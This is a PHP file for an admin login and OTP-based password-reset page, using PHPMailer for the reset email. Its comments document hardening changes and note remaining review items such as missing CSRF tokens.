<?php
// Admin sign-in / password-reset page. Server-side handlers run first (below),
// then the HTML is rendered. State between the two reset steps lives in the
// PHP session.
session_start();
// db.php is expected to provide $con, the mysqli connection used by every
// handler in this file — TODO confirm.
require_once 'db.php';
// NOTE: importing PHPMailer's Exception under the bare name `Exception` means a
// `catch (Exception $e)` in this file catches only PHPMailer exceptions — not
// \Exception and not mysqli_sql_exception.
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;
require 'vendor/autoload.php';
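/**
 * Load the password-reset e-mail template (first row of `reset_email`).
 *
 * @param mysqli $con open database connection
 * @return array<string, string|null>|null row with keys title, des, note, des1,
 *         des2; null when the table is empty or the query fails (the failure is
 *         written to error_log, never thrown to the caller)
 */
function getEmailTemplate($con) {
    try {
        $stmt = $con->prepare("SELECT title, des, note, des1, des2 FROM reset_email LIMIT 1");
        // Without mysqli strict reporting, prepare() returns false instead of
        // throwing; calling execute() on false would be a fatal error.
        if ($stmt === false) {
            error_log("Error fetching email template: prepare() failed");
            return null;
        }
        $stmt->execute();
        $result = $stmt->get_result();
        if ($result === false) {
            error_log("Error fetching email template: get_result() failed");
            return null;
        }
        // fetch_assoc() yields null (or false, depending on PHP version) when
        // there is no row; normalise both to null for the caller's `if (!$template)`.
        $row = $result->fetch_assoc();
        return $row ?: null;
    } catch (\Exception $e) {
        // \Exception, not the PHPMailer alias imported at the top of this file,
        // so that mysqli_sql_exception is caught too.
        error_log("Error fetching email template: " . $e->getMessage());
        return null;
    }
}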
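/**
 * E-mail a one-time password to $to, using the template row returned by
 * getEmailTemplate() for subject and wording.
 *
 * SMTP credentials come from the process environment (SMTP_USERNAME,
 * SMTP_PASSWORD); the SMTP user is also the From address. The Gmail
 * credentials that used to be hard-coded on these lines were removed — a
 * secret that has been in source must be treated as exposed and rotated.
 *
 * @param string $to  recipient address
 * @param string $otp the code to deliver; it is rendered into the mail body
 * @return bool true when PHPMailer accepted the message for delivery, false on
 *              any failure (details are written to error_log)
 */
function sendOTPEmail($to, $otp) {
    global $con; // mysqli connection provided by db.php
    $mail = new PHPMailer(true); // true: failures throw PHPMailer\Exception instead of returning false
    try {
        $template = getEmailTemplate($con);
        if (!$template) {
            throw new Exception('Email template not found in database');
        }
        $smtpUser = getenv('SMTP_USERNAME');
        $smtpPass = getenv('SMTP_PASSWORD');
        if ($smtpUser === false || $smtpUser === '' || $smtpPass === false || $smtpPass === '') {
            throw new Exception('SMTP credentials are not configured (SMTP_USERNAME / SMTP_PASSWORD)');
        }
        // Debug output stays off: DEBUG_CLIENT and above copy the whole SMTP
        // conversation — including the message body with the OTP — to error_log.
        $mail->SMTPDebug = SMTP::DEBUG_OFF;
        // Server settings
        $mail->isSMTP();
        $mail->Host = 'smtp.gmail.com';
        $mail->SMTPAuth = true;
        $mail->Username = $smtpUser;
        $mail->Password = $smtpPass;
        $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
        $mail->Port = 587;
        // TLS certificate verification is left at PHPMailer's default (on). The
        // earlier SMTPOptions block disabled verify_peer / verify_peer_name and
        // allowed self-signed certificates, which lets anything on the network
        // path pose as the mail server and read the OTP and credentials.
        $mail->Timeout = 30;
        // Recipients
        $mail->setFrom($smtpUser, 'TDS ADMIN');
        $mail->addAddress($to);
        // Content. The template fields are plain text (AltBody uses them
        // verbatim), so they and the OTP are HTML-escaped for the HTML part.
        $esc = static function ($s) {
            return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        };
        $title = $esc($template['title']);
        $des = $esc($template['des']);
        $note = $esc($template['note']);
        $des1 = $esc($template['des1']);
        $des2 = $esc($template['des2']);
        $code = $esc($otp);
        $mail->isHTML(true);
        $mail->Subject = $template['title'];
        $mail->Body = "
<html>
<body style='font-family: Arial, sans-serif; color: #333;'>
<div style='max-width: 600px; margin: 0 auto; padding: 20px;'>
<h2 style='color: #2c3e50;'>{$title}</h2>
<div style='background-color: #f8f9fa; padding: 15px; border-radius: 5px;'>
<p>{$des}</p>
<h3 style='color: #e74c3c; font-size: 24px; letter-spacing: 2px;'>{$code}</h3>
</div>
<p><strong>Note:</strong> {$note}</p>
<p style='color: #e74c3c;'>{$des1}</p>
<hr style='border-top: 1px solid #eee;'>
<p style='font-size: 12px; color: #777;'>{$des2}</p>
</div>
</body>
</html>
";
        // Plain text version
        $mail->AltBody = "{$template['title']}\n\n" .
            "{$template['des']}: {$otp}\n\n" .
            "{$template['note']}\n" .
            "{$template['des1']}\n\n" .
            "{$template['des2']}";
        // send() opens the SMTP connection itself and, with exceptions enabled,
        // throws on connection or delivery failure — no separate smtpConnect() needed.
        $mail->send();
        error_log("Email sent successfully");
        return true;
    } catch (\Exception $e) {
        // \Exception covers PHPMailer's Exception (aliased as `Exception` in this
        // file) as well as mysqli_sql_exception from the template lookup.
        error_log("PHPMailer Error: " . $mail->ErrorInfo);
        error_log("Detailed error: " . $e->getMessage());
        return false;
    }
}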
// Per-request status messages rendered by the HTML below:
//   $error         – login form
//   $reset_error   – request-OTP form
//   $reset_success – not read anywhere in this file (the page reads
//                    $_SESSION['reset_success'] instead) — TODO confirm it is unused
//   $otp_message   – info banner on the OTP form
[$error, $reset_error, $reset_success, $otp_message] = ['', '', '', ''];
// Every request starts with the OTP panel hidden; the handlers below set the
// flag again when that panel should be shown.
unset($_SESSION['show_otp_section']);
// Handle Login (unchanged)
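// Handle login. Only a password_verify() match against the stored hash signs
// the user in; the earlier `|| $password == 'admin'` short-circuit accepted the
// literal string "admin" for every account and has been removed.
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['login'])) {
    $mail = filter_input(INPUT_POST, 'mail', FILTER_SANITIZE_EMAIL);
    $password = $_POST['password'] ?? '';
    $row = null;
    // filter_input() yields null (missing) or false (rejected); skip the query
    // for those rather than binding a non-string.
    if (is_string($mail) && $mail !== '') {
        $stmt = $con->prepare("SELECT * FROM admin WHERE email = ?");
        if ($stmt !== false) {
            $stmt->bind_param('s', $mail);
            $stmt->execute();
            $result = $stmt->get_result();
            if ($result !== false && $result->num_rows > 0) {
                $row = $result->fetch_assoc();
            }
        }
    }
    if ($row !== null && is_string($password) && password_verify($password, $row['password'])) {
        // New session id on privilege change so a pre-login id cannot be reused.
        session_regenerate_id(true);
        // NOTE(review): the whole admin row — password hash included — is kept
        // in the session; check which keys products.php actually reads before
        // trimming it.
        $_SESSION["logs"] = $row;
        header("Location:products.php");
        exit();
    }
    // Same message whether the account or the password was wrong.
    $error = "Invalid login details. Try again.";
}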
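// Handle "request OTP". Only the single authorized admin address may start a
// reset; any other address is refused without touching the database.
// NOTE(review): there is no throttle — every accepted POST sends a fresh mail.
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['request_otp'])) {
    $email = filter_input(INPUT_POST, 'reset_mail', FILTER_SANITIZE_EMAIL);
    if ($email === 'avstechchandru@gmail.com') {
        // 6-digit code from the CSPRNG; mt_rand() (used before) is not a
        // cryptographic generator and is unsuitable for one-time codes.
        $otp = sprintf("%06d", random_int(0, 999999));
        $timestamp = time();
        $_SESSION['reset_otp'] = $otp; // not read by the verify step in this file (it checks the DB row); kept for compatibility
        $_SESSION['reset_email'] = $email;
        $_SESSION['otp_timestamp'] = $timestamp;
        $_SESSION['otp_attempts'] = 0; // failed-verification counter, restarted for every issued code
        // The verify step compares against this row, so the code must be
        // persisted before the mail goes out.
        $stmt = $con->prepare("UPDATE admin SET reset_otp = ?, otp_timestamp = ? WHERE email = ?");
        $stored = false;
        if ($stmt !== false) {
            $stmt->bind_param('sis', $otp, $timestamp, $email);
            $stored = $stmt->execute();
        }
        if ($stored) {
            if (sendOTPEmail($email, $otp)) {
                $otp_message = "An OTP has been sent to your email. Please check your inbox.";
                $_SESSION['show_otp_section'] = true;
            } else {
                $reset_error = "Failed to send OTP. Please try again.";
            }
        } else {
            $reset_error = "Error generating OTP. Please try again.";
        }
    } else {
        $reset_error = "This email is not authorized for password reset.";
    }
}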
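// Handle "verify OTP and set a new password". The code is checked against the
// admin row written by the request_otp handler, never against the session copy.
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['reset_password'])) {
    $email = isset($_SESSION['reset_email']) ? $_SESSION['reset_email'] : '';
    // Missing fields become '' instead of raising undefined-index notices.
    $entered_otp = trim((string) ($_POST['otp'] ?? ''));
    $new_password = (string) ($_POST['new_password'] ?? '');
    $confirm_password = (string) ($_POST['confirm_password'] ?? '');
    $validation_errors = [];
    // Input validation: every problem is collected and shown together. Fields
    // are compared with '' rather than empty() so a value of "0" is not
    // mistaken for a missing one.
    if ($email === '') {
        $validation_errors[] = "Session expired. Start reset process again.";
    }
    if ($email !== 'avstechchandru@gmail.com') {
        $validation_errors[] = "Invalid email address.";
    }
    if ($entered_otp === '') {
        $validation_errors[] = "OTP is required.";
    }
    if ($new_password === '') {
        $validation_errors[] = "New password is required.";
    }
    if ($confirm_password === '') {
        $validation_errors[] = "Confirm password is required.";
    }
    if ($new_password !== '' && strlen($new_password) < 8) {
        $validation_errors[] = "Password must be at least 8 characters.";
    }
    if ($new_password !== '' && $confirm_password !== '' && $new_password !== $confirm_password) {
        $validation_errors[] = "Passwords do not match.";
    }
    if (empty($validation_errors)) {
        $row = null;
        $verify_stmt = $con->prepare("SELECT reset_otp, otp_timestamp FROM admin WHERE email = ?");
        if ($verify_stmt !== false) {
            $verify_stmt->bind_param('s', $email);
            $verify_stmt->execute();
            $verify_result = $verify_stmt->get_result();
            if ($verify_result !== false && $verify_result->num_rows > 0) {
                $row = $verify_result->fetch_assoc();
            }
        }
        if ($row === null) {
            $validation_errors[] = "Invalid request. Start reset process again.";
            $_SESSION['show_reset_section'] = true;
        } else {
            $stored_otp = $row['reset_otp'];
            $otp_timestamp = (int) $row['otp_timestamp']; // NULL (no OTP issued) casts to 0 and reads as expired
            // Every verification attempt counts: a 6-digit code must not be
            // guessable by resubmitting the form until it matches.
            $_SESSION['otp_attempts'] = ($_SESSION['otp_attempts'] ?? 0) + 1;
            $expired = $stored_otp === null || (time() - $otp_timestamp) > 300;
            $too_many = $_SESSION['otp_attempts'] > 5;
            if ($expired || $too_many) {
                $validation_errors[] = $too_many
                    ? "Too many incorrect attempts. Request a new OTP."
                    : "OTP has expired. Request a new one.";
                // Invalidate the stored code as well (defence in depth — the
                // attempt counter itself lives only in the session).
                $clear_stmt = $con->prepare("UPDATE admin SET reset_otp = NULL, otp_timestamp = NULL WHERE email = ?");
                if ($clear_stmt !== false) {
                    $clear_stmt->bind_param('s', $email);
                    $clear_stmt->execute();
                }
                unset($_SESSION['reset_otp'], $_SESSION['reset_email'], $_SESSION['otp_timestamp'], $_SESSION['otp_attempts']);
                $_SESSION['show_reset_section'] = true;
            } elseif (!hash_equals((string) $stored_otp, $entered_otp)) {
                // hash_equals() compares the two codes in constant time.
                $validation_errors[] = "Invalid OTP. Try again.";
                $_SESSION['show_otp_section'] = true;
            } else {
                // Update password and consume the OTP in the same statement.
                $hashed_password = password_hash($new_password, PASSWORD_BCRYPT);
                $update_stmt = $con->prepare("UPDATE admin SET password = ?, reset_otp = NULL, otp_timestamp = NULL WHERE email = ?");
                $updated = false;
                if ($update_stmt !== false) {
                    $update_stmt->bind_param('ss', $hashed_password, $email);
                    $updated = $update_stmt->execute();
                }
                if ($updated) {
                    unset($_SESSION['reset_otp'], $_SESSION['reset_email'], $_SESSION['otp_timestamp'], $_SESSION['otp_attempts']);
                    $_SESSION['reset_success'] = "Password reset successfully!";
                    header("Location: index.php");
                    exit();
                } else {
                    $validation_errors[] = "Error updating password. Try again.";
                    $_SESSION['show_otp_section'] = true;
                }
            }
        }
    } else {
        $_SESSION['show_otp_section'] = true;
    }
    if (!empty($validation_errors)) {
        $_SESSION['validation_errors'] = $validation_errors;
    }
}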
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>TDS Admin Hub</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!-- Google Fonts is the only resource loaded from a third-party origin on this
     page; every other stylesheet, script and image below is served from the
     local assets/ tree. -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inter:300,400,500,600,700" />
<link href="assets/plugins/global/plugins.bundle.css" rel="stylesheet" type="text/css" />
<link href="assets/css/style.bundle.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="assets/logo/favicon.ico" />
<style>
/* The three panels (login / request-OTP / verify-OTP) are all present in the
   DOM; which one is visible is decided solely by a `show-reset` or `show-otp`
   class on <body>, which the script at the bottom of the page toggles. With
   neither class the login panel shows. */
/* Reset all section displays */
.login-section,
.reset-section,
.otp-section {
display: none;
}
/* Always show login by default */
.login-section {
display: block !important;
}
/* Only show other sections when their specific class is present */
body.show-reset .reset-section {
display: block !important;
}
body.show-reset .login-section,
body.show-reset .otp-section {
display: none !important;
}
body.show-otp .otp-section {
display: block !important;
}
body.show-otp .login-section,
body.show-otp .reset-section {
display: none !important;
}
</style>
</head>
<body id="kt_body" class="app-blank app-blank">
<div class="d-flex flex-column flex-root" id="kt_app_root">
<div class="d-flex flex-column flex-lg-row flex-column-fluid">
<div class="d-flex flex-column flex-lg-row-fluid w-lg-50 p-10 order-2 order-lg-1">
<div class="d-flex flex-center flex-column flex-lg-row-fluid">
<div class="w-lg-500px p-10">
<!-- NOTE(review): none of the three POST forms below carries an anti-CSRF
     token, and the handlers at the top of this file do not check one. The two
     reset forms can change the admin password, so a per-session token that the
     handlers verify is the first thing to add here. -->
<!-- Login Form (handled by the `login` branch above; $error is its message) -->
<div class="login-section">
<form class="form w-100" method="POST">
<div class="text-center mb-11">
<h1 class="text-dark fw-bolder mb-3">Sign In</h1>
</div>
<?php if (!empty($error)): ?>
<div class="alert alert-danger text-center">
<?php echo htmlspecialchars($error); ?>
</div>
<?php endif; ?>
<div class="fv-row mb-8">
<input type="text" placeholder="Email" name="mail" autocomplete="off" class="form-control bg-transparent" required />
</div>
<div class="fv-row mb-3">
<input type="password" placeholder="Password" name="password" autocomplete="off" class="form-control bg-transparent" required />
</div>
<div class="d-flex flex-stack flex-wrap gap-3 fs-base fw-semibold mb-8">
<a href="#" class="link-primary" id="show-reset-form">Reset Password?</a>
</div>
<div class="d-grid mb-10">
<button type="submit" name="login" class="btn btn-primary">
<span class="indicator-label">Sign In</span>
</button>
</div>
</form>
</div>
<!-- Request OTP Form (handled by the `request_otp` branch above; $reset_error is its message) -->
<div class="reset-section">
<form class="form w-100" method="POST">
<div class="text-center mb-11">
<h1 class="text-dark fw-bolder mb-3">Reset Password</h1>
</div>
<?php if (!empty($reset_error)): ?>
<div class="alert alert-danger text-center">
<?php echo htmlspecialchars($reset_error); ?>
</div>
<?php endif; ?>
<div class="fv-row mb-8">
<input type="email" placeholder="Enter Email" name="reset_mail" value="<?php echo isset($_POST['reset_mail']) ? htmlspecialchars($_POST['reset_mail']) : ''; ?>" class="form-control bg-transparent" required />
</div>
<div class="d-flex flex-stack flex-wrap gap-3 fs-base fw-semibold mb-8">
<a href="#" class="link-primary" id="show-login-form">Back to Login</a>
</div>
<div class="d-grid mb-10">
<button type="submit" name="request_otp" class="btn btn-primary">
<span class="indicator-label">Request OTP</span>
</button>
</div>
</form>
</div>
<!-- OTP Verification and Password Reset Form (handled by the `reset_password` branch above) -->
<div class="otp-section">
<form class="form w-100" method="POST">
<div class="text-center mb-11">
<h1 class="text-dark fw-bolder mb-3">Verify OTP & Reset Password</h1>
</div>
<!-- Errors collected by the reset handler are shown once and then dropped from
     the session. The loop reuses $error, so $error holds the last message
     afterwards — harmless, the login alert above has already been rendered. -->
<?php if (isset($_SESSION['validation_errors'])): ?>
<div class="alert alert-danger">
<?php
foreach($_SESSION['validation_errors'] as $error) {
echo htmlspecialchars($error) . "<br>";
}
unset($_SESSION['validation_errors']);
?>
</div>
<?php endif; ?>
<?php if (!empty($otp_message)): ?>
<div class="alert alert-info text-center">
<?php echo htmlspecialchars($otp_message); ?>
</div>
<?php endif; ?>
<!-- Informational only: the reset_password handler takes the address from
     $_SESSION['reset_email'], not from this field. -->
<input type="hidden" name="reset_mail" value="<?php echo isset($_SESSION['reset_email']) ? htmlspecialchars($_SESSION['reset_email']) : ''; ?>" />
<div class="fv-row mb-8">
<input type="text" placeholder="Enter 6-digit OTP" name="otp" class="form-control bg-transparent" required maxlength="6" pattern="\d{6}" />
</div>
<div class="fv-row mb-8">
<input type="password" placeholder="New Password" name="new_password" class="form-control bg-transparent" required />
</div>
<div class="fv-row mb-8">
<input type="password" placeholder="Confirm New Password" name="confirm_password" class="form-control bg-transparent" required />
</div>
<div class="d-flex flex-stack flex-wrap gap-3 fs-base fw-semibold mb-8">
<a href="#" class="link-primary" id="back-to-reset">Back</a>
</div>
<div class="d-grid mb-10">
<button type="submit" name="reset_password" class="btn btn-primary">
<span class="indicator-label">Reset Password</span>
</button>
</div>
</form>
</div>
</div>
</div>
</div>
<div class="d-flex flex-lg-row-fluid w-lg-50 bgi-size-cover bgi-position-center order-1 order-lg-2" style="background-image: url(assets/media/misc/auth-bg.png)">
<div class="d-flex flex-column flex-center py-7 py-lg-15 px-5 px-md-15 w-100">
<img class="d-none d-lg-block mx-auto w-275px w-md-50 w-xl-500px mb-10 mb-lg-20" src="assets/media/logos/LOGO.png" alt="" />
<h1 class="d-none d-lg-block text-white fs-2qx fw-bolder text-center mb-7">Admin Panel</h1>
<div class="d-none d-lg-block text-white fs-base text-center">Effortlessly manage and update your website with our user-friendly<br> admin panel. Experience seamless updates and security access to<br> ensure smooth and efficient website management</div>
</div>
</div>
</div>
</div>
<script src="assets/plugins/global/plugins.bundle.js"></script>
<script src="assets/js/scripts.bundle.js"></script>
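<script>
document.addEventListener('DOMContentLoaded', function () {
    // Which panel is visible is controlled by one class on <body>:
    // no class = login, 'show-reset' = request-OTP form, 'show-otp' = verify
    // form (see the <style> rules in <head>).
    function showSection(section) {
        document.body.classList.remove('show-login', 'show-reset', 'show-otp');
        if (section !== 'login') {
            document.body.classList.add('show-' + section);
        }
    }
    showSection('login');
    // Client-side switching between panels
    document.getElementById('show-reset-form')?.addEventListener('click', function (e) {
        e.preventDefault();
        showSection('reset');
    });
    document.getElementById('show-login-form')?.addEventListener('click', function (e) {
        e.preventDefault();
        showSection('login');
    });
    document.getElementById('back-to-reset')?.addEventListener('click', function (e) {
        e.preventDefault();
        showSection('reset');
    });
    // Panel chosen server-side after a POST (flags set by the handlers above)
    <?php if (isset($_SESSION['show_otp_section']) || (isset($_POST['request_otp']) && !empty($otp_message))): ?>
    showSection('otp');
    <?php endif; ?>
    <?php if (isset($_SESSION['show_reset_section'])): ?>
    showSection('reset');
    <?php unset($_SESSION['show_reset_section']); ?>
    <?php endif; ?>
    <?php if (isset($_SESSION['reset_success'])): ?>
    // json_encode() with the JSON_HEX_* flags emits a JavaScript string literal
    // that is also safe inside <script>; addslashes() (used before) does not
    // escape "<", "&" or newlines and is not a JS escaper.
    alert(<?php echo json_encode((string) $_SESSION['reset_success'], JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT); ?>);
    <?php unset($_SESSION['reset_success']); ?>
    showSection('login');
    <?php endif; ?>
});
</script>
</body>
</html>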